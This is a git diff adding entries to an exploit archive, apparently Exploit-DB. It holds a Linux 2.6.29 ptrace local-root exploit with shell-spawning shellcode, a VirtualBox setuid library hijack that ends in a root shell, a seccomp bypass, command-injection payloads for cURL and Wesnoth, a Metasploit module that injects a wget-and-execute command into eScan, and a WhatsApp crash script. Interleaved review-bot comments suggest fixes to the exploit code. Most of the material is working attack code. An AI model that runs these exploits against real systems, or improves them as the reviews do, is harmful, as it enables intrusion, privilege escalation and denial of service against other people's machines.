+MySQL 5.1.31 and earlier
+MySQL 6.0.9 and earlier
+
+select updatexml('','0/a','');
+select extractvalue('','0/a');
\ No newline at end of file
diff --git a/platforms/linux/dos/32849.txt b/platforms/linux/dos/32849.txt
new file mode 100755
index 000000000..df517635c
--- /dev/null
+++ b/platforms/linux/dos/32849.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/34090/info
+
+PostgreSQL is prone to a remote denial-of-service vulnerability.
+
+Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users.
+
+test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM
+ascii_to_mic;
+CREATE CONVERSION
+test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM
+mic_to_ascii;
+CREATE CONVERSION
+test=# set client_encoding to 'LATIN1';
\ No newline at end of file
diff --git a/platforms/linux/dos/32856.txt b/platforms/linux/dos/32856.txt
new file mode 100755
index 000000000..7d88d8f17
--- /dev/null
+++ b/platforms/linux/dos/32856.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34136/info
+
+MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files.
+
+Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
+
+http://www.exploit-db.com/sploits/32856.aac
\ No newline at end of file
diff --git a/platforms/linux/dos/32857.txt b/platforms/linux/dos/32857.txt
new file mode 100755
index 000000000..d886def3e
--- /dev/null
+++ b/platforms/linux/dos/32857.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34136/info
+
+MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files.
+
+Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
+
+http://www.exploit-db.com/sploits/32857.ogm
\ No newline at end of file
diff --git a/platforms/linux/local/32815.c b/platforms/linux/local/32815.c
new file mode 100755
index 000000000..f296bb14d
--- /dev/null
+++ b/platforms/linux/local/32815.c
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/33906/info
+
+The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.
+
+This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.
+
+A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.
+
+Linux kernel 2.6.28 is vulnerable; other versions may also be affected.
+
+#include
+#include
+#include
+#include
+
+static int the_child(void* arg) {
+ sleep(1);
+ _exit(2);
+}
+
+int main(int argc, const char* argv[]) {
+ int ret = fork();
+ if (ret < 0)
+ {
+ perror("fork");
+ _exit(1);
+ }
+ else if (ret > 0)
+ {
+ for (;;);
+ }
+ setgid(99);
+ setuid(65534);
+ {
+ int status;
+ char* stack = malloc(4096);
+ int flags = SIGKILL | CLONE_PARENT;
+ int child = clone(the_child, stack + 4096, flags, NULL);
+ }
+ _exit(100);
+}
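Review bot: The four `#include` directives at the top of 32815.c carry no header name and the advisory prose above them is not wrapped in a comment, so the file as committed does not compile; either restore the header names (the angle-bracketed names were presumably lost to tag stripping) and fence the prose in `/* ... */`, or store the listing as .txt like the neighbouring entries. Separately, the return values of `setgid(99)` and `setuid(65534)` are discarded, so if the privilege drop fails the test silently runs with its original credentials and its outcome says nothing about the kernel's signal-origin check; `if (setgid(99) || setuid(65534)) { perror("drop privileges"); _exit(1); }` would make the test honest. `the_child` is declared to return int but never returns (it calls `_exit`), `malloc` is unchecked, and `child`/`status` are unused — harmless but noisy under `-Wall`.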
diff --git a/platforms/linux/local/32820.txt b/platforms/linux/local/32820.txt
new file mode 100755
index 000000000..4a858ae32
--- /dev/null
+++ b/platforms/linux/local/32820.txt
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/33922/info
+
+OpenSC is prone to an unauthorized-access vulnerability.
+
+Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
+
+Versions prior to OpenSC 0.11.7 are vulnerable.
+
+The following proof of concept is available:
+
+create a file with a secret:
+echo "This is my secret data" > secret-file
+
+To initialise a blank card:
+pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
+
+To write a private data object to the card:
+pkcs11-tool --label "my secret" --type data --write-object secret-file
+--private --login --pin 12345
+
+To see all objects on the card:
+pkcs15-tool --dump
+This will list the data object, including the path it is stored, e.g.:
+"Path: 3f0050154701"
+
+To access such an object with low-level tools:
+
+opensc-explorer
+cd 5015
+get 4701
\ No newline at end of file
diff --git a/platforms/linux/local/32829.c b/platforms/linux/local/32829.c
new file mode 100755
index 000000000..a183bf01c
--- /dev/null
+++ b/platforms/linux/local/32829.c
@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/33948/info
+
+The Linux kernel is prone to a local security-bypass vulnerability.
+
+A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges.
+
+ /* test case for seccomp circumvention on x86-64
+ There are two failure modes: compile with -m64 or compile with -m32.
+
+ The -m64 case is the worst one, because it does "chmod 777 ." (could
+ be any chmod call). The -m32 case demonstrates it was able to do
+ stat(), which can glean information but not harm anything directly.
+
+ A buggy kernel will let the test do something, print, and exit 1; a
+ fixed kernel will make it exit with SIGKILL before it does anything.
+ */
+
+ #define _GNU_SOURCE
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+
+ int
+ main (int argc, char **argv)
+ {
+ char buf[100];
+ static const char dot[] = ".";
+ long ret;
+ unsigned st[24];
+ if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
+ perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
+ #ifdef __x86_64__
+ assert ((uintptr_t) dot < (1UL << 32));
+ asm ("int $0x80 # %0 <- %1(%2 %3)"
+ : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
+ ret = snprintf (buf, sizeof buf,
+ "result %ld (check mode on .!)\n", ret);
+ #elif defined __i386__
+ asm (".code32\n"
+ "pushl %%cs\n"
+ "pushl $2f\n"
+ "ljmpl $0x33, $1f\n"
+ ".code64\n"
+ "1: syscall # %0 <- %1(%2 %3)\n"
+ "lretl\n"
+ ".code32\n"
+ "2:"
+ : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
+ if (ret == 0)
+ ret = snprintf (buf, sizeof buf,
+ "stat . -> st_uid=%u\n", st[7]);
+ else
+ ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
+ #else
+ # error "not this one"
+ #endif
+ write (1, buf, ret);
+
+ syscall (__NR_exit, 1);
+ return 2;
+ }
diff --git a/platforms/linux/local/32848.txt b/platforms/linux/local/32848.txt
new file mode 100755
index 000000000..e4c350d78
--- /dev/null
+++ b/platforms/linux/local/32848.txt
@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/34080/info
+
+Sun xVM VirtualBox is prone to a local privilege-escalation vulnerability.
+
+An attacker can exploit this vulnerability to run arbitrary code with superuser privileges.
+
+The following versions for the Linux platform are vulnerable:
+
+Sun xVM VirtualBox 2.0
+Sun xVM VirtualBox 2.1
+
+$ id -u
+1002
+
+$ cat test.c
+#include
+#include
+__attribute__((constructor))
+void awesome(void)
+{
+ char *argv[] = { "sh", NULL };
+ extern char *environ;
+ syscall(SYS_setuid, 0);
+ syscall(SYS_execve, "/bin/sh", argv, environ);
+}
+
+$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2
+
+$ ls -l /opt/VirtualBox/VirtualBox
+-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox
+
+$ ln /opt/VirtualBox/VirtualBox
+
+$ ls -l VirtualBox
+-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox
+
+$ ./VirtualBox
+./VirtualBox: /home/vapier/libdl.so.2: no version information available
+(required by ./VirtualBox)
+sh-4.0# whoami
+root
+
diff --git a/platforms/linux/local/8678.c b/platforms/linux/local/8678.c
index f21fdcd10..d47ad6c04 100755
--- a/platforms/linux/local/8678.c
+++ b/platforms/linux/local/8678.c
@@ -1,101 +1,101 @@
-/*
-* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
-* ==========================================================================
-* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
-* a process to gain elevated privileges under certain conditions. The vulnerability is
-* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
-* "execve()". This can be exploited to potentially execute arbitrary code with root
-* privileges by attaching to a setuid process. The race is particularly narrow, this
-* exploit checks that it has attached to the correct process before attempting to
-* inject shellcode which helps reduce false positives and shells being spawned with
-* lower privileges.
-*
-* Ex.
-* matthew@matthew-desktop:~$ id
-* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
-* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
-* matthew@matthew-desktop:~$ uname -a
-* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
-* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
-* [... much scroll removed, go make coffee, get a job, do something while running ...]
-* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
-* proc on /proc type proc (rw,noexec,nosuid,nodev)
-* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
-* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
-* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
-* udev on /dev type tmpfs (rw,mode=0755)
-* devshm on /dev/shm type tmpfs (rw)
-* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
-* securityfs on /sys/kernel/security type securityfs (rw)
-* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
-* [ WIN! 18281
-* [ Overwritten 0xb8097430
-* # id
-* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
-* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
-* #
-*
-* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
-* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
-* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
-* shoryuken.c at any time.
-*
-* -- prdelka
-*/
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90"
- "\x6a\x23\x58\x31"
- "\xdb\xcd\x80"
- "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
- "\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
- "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
-
-int main(){
- pid_t child;
- int eip, i = 0;
- struct user_regs_struct regs;
- char *argv[] = {"mount",0};
- char *envp[] = {"",0};
- child = fork();
- if(child == 0) {
- execve("/bin/mount",argv,envp);
- }
- else {
- if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
- char buf[256];
- sprintf(buf, "/proc/%d/cmdline", child);
- int fd = open(buf, O_RDONLY);
- read(fd, buf, 2);
- close(fd);
- if(buf[0] == 'm') {
- printf("[ WIN! %d\n", child);
- fflush(stdout);
- ptrace(PTRACE_GETREGS, child, NULL, ®s);
- eip = regs.eip;
- while (i < strlen(shellcode)){
- ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
- i += 4;
- eip += 4;
- }
- printf("[ Overwritten 0x%x\n",regs.eip);
- ptrace(PTRACE_SETREGS, child, NULL, ®s);
- ptrace(PTRACE_DETACH, child, NULL,NULL);
- usleep(1);
- wait(0);
- }
- }
- }
- return 0;
-}
-
-// milw0rm.com [2009-05-14]
+/*
+* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
+* ==========================================================================
+* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
+* a process to gain elevated privileges under certain conditions. The vulnerability is
+* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
+* "execve()". This can be exploited to potentially execute arbitrary code with root
+* privileges by attaching to a setuid process. The race is particularly narrow, this
+* exploit checks that it has attached to the correct process before attempting to
+* inject shellcode which helps reduce false positives and shells being spawned with
+* lower privileges.
+*
+* Ex.
+* matthew@matthew-desktop:~$ id
+* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
+* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
+* matthew@matthew-desktop:~$ uname -a
+* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
+* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
+* [... much scroll removed, go make coffee, get a job, do something while running ...]
+* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
+* proc on /proc type proc (rw,noexec,nosuid,nodev)
+* /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
+* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
+* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
+* udev on /dev type tmpfs (rw,mode=0755)
+* devshm on /dev/shm type tmpfs (rw)
+* devpts on /dev/pts type devpts (rw,gid=5,mode=620)
+* securityfs on /sys/kernel/security type securityfs (rw)
+* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
+* [ WIN! 18281
+* [ Overwritten 0xb8097430
+* # id
+* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
+* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
+* #
+*
+* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
+* this exploit, sell it, recode it, rip the header and claim it as your own on the condition
+* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
+* shoryuken.c at any time.
+*
+* -- prdelka
+*/
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x90"
+ "\x6a\x23\x58\x31"
+ "\xdb\xcd\x80"
+ "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
+ "\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
+ "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
+
+int main(){
+ pid_t child;
+ int eip, i = 0;
+ struct user_regs_struct regs;
+ char *argv[] = {"mount",0};
+ char *envp[] = {"",0};
+ child = fork();
+ if(child == 0) {
+ execve("/bin/mount",argv,envp);
+ }
+ else {
+ if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
+ char buf[256];
+ sprintf(buf, "/proc/%d/cmdline", child);
+ int fd = open(buf, O_RDONLY);
+ read(fd, buf, 2);
+ close(fd);
+ if(buf[0] == 'm') {
+ printf("[ WIN! %d\n", child);
+ fflush(stdout);
+ ptrace(PTRACE_GETREGS, child, NULL, ®s);
+ eip = regs.eip;
+ while (i < strlen(shellcode)){
+ ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
+ i += 4;
+ eip += 4;
+ }
+ printf("[ Overwritten 0x%x\n",regs.eip);
+ ptrace(PTRACE_SETREGS, child, NULL, ®s);
+ ptrace(PTRACE_DETACH, child, NULL,NULL);
+ usleep(1);
+ wait(0);
+ }
+ }
+ }
+ return 0;
+}
+
+// milw0rm.com [2009-05-14]
diff --git a/platforms/linux/remote/32825.txt b/platforms/linux/remote/32825.txt
new file mode 100755
index 000000000..42a252a62
--- /dev/null
+++ b/platforms/linux/remote/32825.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/33937/info
+
+The 'djbdns' package is prone to a remote cache-poisoning vulnerability.
+
+An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.
+
+This issue affects djbdns 1.05; other versions may also be vulnerable.
+
+# Download and build ucspi-tcp-0.88.
+$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
+$ tar -zxf ucspi-tcp-0.88.tar.gz
+$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
+$ make -C ucspi-tcp-0.88
+
+# Download and build djbdns-1.05.
+$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
+$ tar -zxf djbdns-1.05.tar.gz
+$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
+$ make -C djbdns-1.05
+
+# Use tcpclient and axfr-get to do a zone transfer for
+# www.example.com from www.example2.com.
+$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp
+
+# Use tinydns-data to compile data into data.cdb.
+$ ./djbdns-1.05/tinydns-data
+
+# Simulate an A query for www.example.com using the data
+# from the zone transfer.
+$ ./djbdns-1.05/tinydns-get a www.example.com
+
+
diff --git a/platforms/linux/remote/32834.txt b/platforms/linux/remote/32834.txt
new file mode 100755
index 000000000..7a3ae5e8d
--- /dev/null
+++ b/platforms/linux/remote/32834.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33962/info
+
+cURL/libcURL is prone to a security-bypass vulnerability.
+
+Remote attackers can exploit this issue to bypass certain security restrictions and carry out various attacks.
+
+This issue affects cURL/libcURL 5.11 through 7.19.3. Other versions may also be vulnerable.
+
+The following example redirection request may be used to carry out this attack:
+Location: scp://name:passwd@host/a'``;date >/tmp/test``;'
\ No newline at end of file
diff --git a/platforms/linux/remote/32837.py b/platforms/linux/remote/32837.py
new file mode 100755
index 000000000..8e4461a88
--- /dev/null
+++ b/platforms/linux/remote/32837.py
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/33971/info
+
+Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
+
+Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
+
+Versions prior to Wesnoth 1.5.11 are affected.
+
+#!WPY
+import threading
+os = threading._sys.modules['os']
+f = os.popen("firefox 'http://www.example.com'")
+f.close()
\ No newline at end of file
diff --git a/platforms/linux/remote/764.c b/platforms/linux/remote/764.c
index 5965e8818..bc83a3384 100755
--- a/platforms/linux/remote/764.c
+++ b/platforms/linux/remote/764.c
@@ -1,4 +1,6 @@
/*
+ * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
+ *
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
@@ -1291,4 +1293,4 @@ int main(int argc, char* argv[])
}
/* spabam: It isn't 0day */
-// milw0rm.com [2003-04-04]
+// milw0rm.com [2003-04-04]
\ No newline at end of file
diff --git a/platforms/linux/webapps/32869.rb b/platforms/linux/webapps/32869.rb
new file mode 100755
index 000000000..dbcf1048b
--- /dev/null
+++ b/platforms/linux/webapps/32869.rb
@@ -0,0 +1,166 @@
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "eScan Web Management Console Command Injection",
+ 'Description' => %q{
+ This module exploits a command injection vulnerability found in the eScan Web Management
+ Console. The vulnerability exists while processing CheckPass login requests. An attacker
+ with a valid username can use a malformed password to execute arbitrary commands. With
+ mwconf privileges, the runasroot utility can be abused to get root privileges. This module
+ has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Joxean Koret', # Vulnerability Discovery and PoC
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
+ 'DisableNops' => true
+ },
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'Privileged' => true,
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Targets' =>
+ [
+ ['eScan 5.5-2 / Linux', {}],
+ ],
+ 'DisclosureDate' => "Apr 04 2014",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(10080),
+ OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
+ OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
+ OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
+ OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
+ OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
+ OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
+ ], self.class)
+ end
+
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path.to_s, 'index.php')
+ })
+
+ if res and res.code == 200 and res.body =~ /eScan WebAdmin/
+ return Exploit::CheckCode::Detected
+ end
+
+ Exploit::CheckCode::Unknown
+ end
+
+ def cmd_exec(session, cmd)
+ case session.type
+ when /meterpreter/
+ print_warning("#{peer} - Use a shell payload in order to get root!")
+ when /shell/
+ o = session.shell_command_token(cmd)
+ o.chomp! if o
+ end
+ return "" if o.nil?
+ return o
+ end
+
+ # Escalating privileges here because runasroot only can't be executed by
+ # mwconf uid (196).
+ def on_new_session(session)
+ cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
+ super
+ end
+
+ def primer
+ @payload_url = get_uri
+ wget_payload
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Request: #{request.uri}")
+ if request.uri =~ /#{Regexp.escape(get_resource)}/
+ print_status("Sending payload...")
+ send_response(cli, @pl)
+ end
+ end
+
+ def exploit
+ @pl = generate_payload_exe
+ if @pl.blank?
+ fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
+ end
+ @payload_url = ""
+
+ if datastore['EXTURL'].blank?
+ begin
+ Timeout.timeout(datastore['HTTPDELAY']) {super}
+ rescue Timeout::Error
+ end
+ exec_payload
+ else
+ @payload_url = datastore['EXTURL']
+ wget_payload
+ exec_payload
+ end
+ end
+
+ # we execute in this way, instead of an ARCH_CMD
+ # payload because real badchars are: |&)(!><'"`[space]
+ def wget_payload
+ @dropped_elf = rand_text_alpha(rand(5) + 3)
+ command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
+
+ print_status("#{peer} - Downloading the payload to the target machine...")
+ res = exec_command(command)
+ if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
+ register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
+ else
+ fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
+ end
+ end
+
+ def exec_payload
+ command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
+ command << File.join(datastore['WRITABLEDIR'], @dropped_elf)
+
+ print_status("#{peer} - Executing the payload...")
+ exec_command(command, 1)
+ end
+
+ def exec_command(command, timeout=20)
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
+ 'vars_post' => {
+ 'uname' => datastore['USERNAME'],
+ 'pass' => ";#{command}",
+ 'product_name' => 'escan',
+ 'language' => 'English',
+ 'login' => 'Login'
+ }
+ }, timeout)
+ end
+
+end
\ No newline at end of file
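Review bot: The `check` method uses `and` where the rest of the module (`wget_payload`) uses `&&`; `and` binds more loosely than `=` and `&&` and is conventionally reserved for control flow, so `if res && res.code == 200 && res.body =~ /eScan WebAdmin/` is the consistent form. The comment above `on_new_session`, `runasroot only can't be executed by mwconf uid (196)`, reads as a contradiction; presumably it means the binary can only be run as the mwconf uid (196) — confirm and reword. In `cmd_exec` the two trailing `return` lines can collapse to `o.to_s`, which yields `""` for nil and the string itself otherwise.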
diff --git a/platforms/multiple/dos/32836.html b/platforms/multiple/dos/32836.html
new file mode 100755
index 000000000..bf34a923a
--- /dev/null
+++ b/platforms/multiple/dos/32836.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33969/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
+
+Firefox 2.0.0.20 is vulnerable; other versions may also be affected.
+
+FireFox Print() Function Malform input Crash--------------In The Name Of God--------------- ---------Apa Center Of Yazd University--------- -------------Http://Www.Ircert.Cc--------------
Tested On : FireFox <= 2.0.0.20 Fully Update Note : If the browser alert for print choose cancel
Author : b3hz4d (Seyed Behzad Shaghasemi) Site : Www.DeltaHacking.Net Date : 3 Mar 2009 Contact: behzad_sh_66@yahoo.com Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers
\ No newline at end of file
diff --git a/platforms/multiple/dos/32865.py b/platforms/multiple/dos/32865.py
new file mode 100755
index 000000000..0c3e7f717
--- /dev/null
+++ b/platforms/multiple/dos/32865.py
@@ -0,0 +1,118 @@
+#!/usr/bin/python
+#-*- coding: utf-8 -*
+
+# Title: WhatsApp Remote Crash on non-printable characters
+# Product: WhatsApp
+# Vendor Homepage: http://www.whatsapp.com
+# Vulnerable Version(s): 2.11.7 and prior on iOS
+# Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4
+# Solution Status: Fixed by Vendor on v2.11.8
+# Date: 8/04/2014
+#
+# Authors:
+# Jaime Sánchez @segofensiva
+# Pablo San Emeterio @psaneme
+#
+# Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS.
+# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
+# engaging in an interactive conversation over WhatsApp protocol
+#
+# More info at:
+# http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html
+# See the slides of the research/talk at RootedCON 2014 at:
+# http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014
+
+import argparse, sys, os, csv
+from Yowsup.Common.utilities import Utilities
+from Yowsup.Common.debugger import Debugger
+from Yowsup.Common.constants import Constants
+from Examples.CmdClient import WhatsappCmdClient
+from Examples.EchoClient import WhatsappEchoClient
+from Examples.ListenerClient import WhatsappListenerClient
+from Yowsup.Registration.v1.coderequest import WACodeRequest
+from Yowsup.Registration.v1.regrequest import WARegRequest
+from Yowsup.Registration.v1.existsrequest import WAExistsRequest
+from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
+from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
+from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
+from Yowsup.Contacts.contacts import WAContactsSyncRequest
+
+import threading,time, base64
+
+DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
+COUNTRIES_CSV = "countries.csv"
+
+DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
+
+
+######## Yowsup Configuration file #####################
+# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
+# phone: Your full phone number including country code, without '+' or '00'
+# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
+# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
+# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
+# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
+# or want to register, you can leave this field blank or set it to some random text.
+# password: Password to use for login. You obtain this password when you register using Yowsup.
+######################################################
+MINE_CONFIG ="config.cfg"
+
+def getCredentials(config = DEFAULT_CONFIG):
+ if os.path.isfile(config):
+ f = open(config)
+
+ phone = ""
+ idx = ""
+ pw = ""
+ cc = ""
+
+ try:
+ for l in f:
+ line = l.strip()
+ if len(line) and line[0] not in ('#',';'):
+
+ prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
+
+ varname = prep[0].strip()
+ val = prep[1].strip()
+
+ if varname == "phone":
+ phone = val
+ elif varname == "id":
+ idx = val
+ elif varname =="password":
+ pw =val
+ elif varname == "cc":
+ cc = val
+
+ return (cc, phone, idx, pw);
+ except:
+ pass
+
+ return 0
+
+def main(phone):
+ credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
+
+ if credentials:
+
+ countryCode, login, identity, password = credentials
+ identity = Utilities.processIdentity(identity)
+
+ password = base64.b64decode(password)
+
+ # Custom message that will crash WhatsApp
+ message = message = "\xf4\xaa\xde\x04\xbf"
+
+ #print countryCode, login, identity, password
+ wa = WhatsappEchoClient(phone, message)
+ wa.login(login, password)
+
